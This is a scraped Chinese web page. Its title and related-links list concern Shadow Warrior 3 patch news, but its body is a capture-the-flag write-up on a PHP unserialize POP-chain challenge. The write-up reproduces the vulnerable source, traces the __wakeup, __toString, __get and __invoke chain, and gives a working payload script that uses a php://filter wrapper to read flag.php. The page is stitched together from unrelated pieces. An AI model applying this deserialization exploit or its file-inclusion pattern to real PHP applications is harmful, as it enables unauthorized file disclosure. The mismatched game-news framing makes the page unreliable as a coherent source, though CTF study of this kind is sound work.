2. 程式人生 > 遊戲 >《影子武士3》釋出1.04補丁更新 新增新難度英雄模式

《影子武士3》釋出1.04補丁更新 新增新難度英雄模式

阿新 發佈:2022-05-10 
Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    
 
public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        
 
return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        
 
$this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

這題用到的魔術方法

__construct   當一個物件建立時被呼叫,
__toString   當一個物件被當作一個字串被呼叫。
__wakeup()   使用unserialize時觸發
__get()    用於從不可訪問的屬性讀取資料
#難以訪問包括:(1)私有屬性,(2)沒有初始化的屬性
__invoke()   當指令碼嘗試將物件呼叫為函式時觸發

構造一下pop鏈

首先反序列化函式,觸發Show類中的wakeup方法,wakeup方法做字串處理,觸發tosring方法,如果將str例項化為Test,因為Test類中不含source屬性,所以呼叫get方法,將function例項化為Modifier類,即可觸發其中invoke方法,最終呼叫檔案包含函式,讀取flag.php

payload

<?php 
class Modifier {
    protected  $var = 'php://filter/convert.base64-encode/resource=flag.php';
    
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
    }
    
}

class Test{
    public $p;
    
}

$b = new Show();
$b->str = new Test();
$b->str->p = new Modifier;
$a = new Show($b);

echo urlencode(serialize($a));
?>

相關推薦

影子武士3釋出1.04補丁更新 新增難度英雄模式

開發商Flying Wild Hog為遊戲《影子武士3釋出1.04補丁新增了一個名為“英雄模式”的新難度。這本質上是一個困難模式,生命有限,你可以通過完成終結技來獲得生命,但是要注意,當用光所有生命時,你就會永遠失

《詭野西部》1.02補丁更新 新增功能內容

沉浸式模擬世界遊戲《詭野西部》釋出1.02補丁“Snake-In-My-Boot”更新,為遊戲添加了功能內容,並基於社群反饋,修復了大量錯誤。

《極限國度》釋出1.04更新 適用於全平臺

《極限國度》釋出1.04版本更新,此更新適用於全平臺,現已可以免費下載。本次更新添加了對PVP模式的調整、PS5的記憶體修復等。除此之外,1.04更新還解決玩家卡在記分牌上的錯誤等。

《紀元:變異》釋出1.04版本更新 結局上線

《紀元:變異》4月22日釋出1.04版本更新,除新增一些服裝和新增簡單模式外,還為遊戲上線了一個更加完整的結局。此前《紀元:變異》曾因劇情問題被玩家所詬病,Steam測評也降為“褒貶不一”。

《GT賽車7》釋出1.13版本更新 新增三款新車

《GT賽車7》4月25日釋出1.13版本更新,添加了三款新車和賽道配置,以及其他錯誤修復等內容。

《全面戰爭:戰錘31.2版本更新上線 免費DLC包

《全面戰爭:戰錘3》5月17日更新1.2版本,Microsoft Store、Steam和Epic均可免費更新,這次更新在遊戲中引入了各種更改,修復,增添,以及一些功能。

《馬里奧高爾夫》釋出最後一次免費更新 新增角色與模式

《馬里奧高爾夫:超級衝刺》今日釋出4.0.0版本更新,美國任天堂發推表示,此次是該遊戲的最後一次免費更新

影子武士3》下週開始將釋出多個演示視訊

影子武士3》官推今天發推宣佈,他們將從下週開始公佈多個演示視訊,由IGN獨家釋出

《漫威銀河護衛隊》更新1.04補丁 修復若干問題

《漫威銀河護衛隊》官方發推表示,一個1.04補丁已在PS平臺釋出,並將在下週釋出在Xbox平臺上(Xbox One上為1.5版/Xbox S上為2.5版) ,今天稍後將在PC登陸,補丁說明將釋出在Steam上。

Devolver Digital《影子武士3》將於31日發行

影子武士3》將於31日面向PlayStation 4、Xbox One和PC平臺(通過Steam)發行。《影子武士3》預購包,售價49.99美元,包括《暗影戰士》和《暗影戰士2》,以及《暗影戰士3》限量版武士刀面板。

影子武士3》公佈最新預告片 31日正式發售

Flying Wild Hog再次確認,《影子武士3》將於31日正式發售,登陸PC、PS4和Xbox One平臺。廠商今日還公佈了遊戲的最新預告片。

《寶可夢傳說 阿爾宙斯》釋出1.0.2更新補丁 修復若干bug

任天堂釋出了《寶可夢傳說阿爾宙斯》釋出1.0.2補丁,此次更新修復了遊戲中的一些bug,現在已經可以下載更新了。更新補丁時,Switch需要全程聯網。

影子武士3》官方第三部實機預告公佈 31日推出

發行商Devolver Digital和開發商Flying Wild Hog日前釋出了《影子武士3》的第三部官方實機預告片。

影子武士3補丁正在開發中 將在全平臺上線

影子武士3》於上週正式發售,雖然獲得了相當多的好評,但遊戲流程短、缺乏合作等內容仍然被很多玩家詬病。因此,開發者釋出公告,承認《影子武士3》的工作並沒有完成,並且還承諾將提供補丁解決問題。

《全面戰爭:戰錘31.02補丁下週釋出 1.1有更多內容

之前CA官方公佈了《全面戰爭:戰錘31.02版補丁部分內容,現在官方又透露了補丁更多內容。1.02版補丁將於下週釋出,包含效能優化提升,解決強制垂直同步、遊戲啟動等問題。

影子武士3更新新增硬核模式 調整平衡性

近日Flying Wild Hog釋出了《影子武士31.03版更新,添加了“硬核模式”。在這種模式下,敵人會造成更多傷害,並更頻繁地“懲罰玩家的失誤”。資源獲取量變少,無敵時間也被縮短。

影子武士3》開發商還有兩個未公佈的遊戲

波蘭遊戲開發商Flying Wild Hog在去年公佈了《影子武士3》和《暗邪西部》,顯然該工作室還有更多新作尚未公佈。在今天釋出的部落格中,Flying

《博德之門3》4號補丁更新預告 之前存檔無法使用

近日拉瑞安工作室在微博上釋出了《博德之門3》4號補丁更新預告,該補丁即將上線,將新增許多全新內容,但因為有很多改變導致之前存檔將無法繼續使用。

《靈媒》釋出 1.2 版更新:支援 21:9、32:9 超寬頻魚屏顯示器

3月11日訊息恐怖遊戲《靈媒》(The Medium)於 1 月 28 日正式釋出,售價 198 元人民幣,同時登陸 Steam 平臺以及 Xbox Series X/S、XGP 訂閱。這款遊戲於 2 月 13 日釋出1.1更新,修復了顯示卡利用率不足的 B

《雷神之錘 2》釋出 1.5 版更新:增加 Vulkan 光追支援,修復 Bug

4月1日訊息據外媒 DSOGaming 訊息,遊戲《雷神之錘 2》3 月 31 日釋出1.5 版本更新,帶來了 Vulkan 光追的支援,提供了的 API。此外,本次更新還修復了遊戲最小化時的崩潰等問題。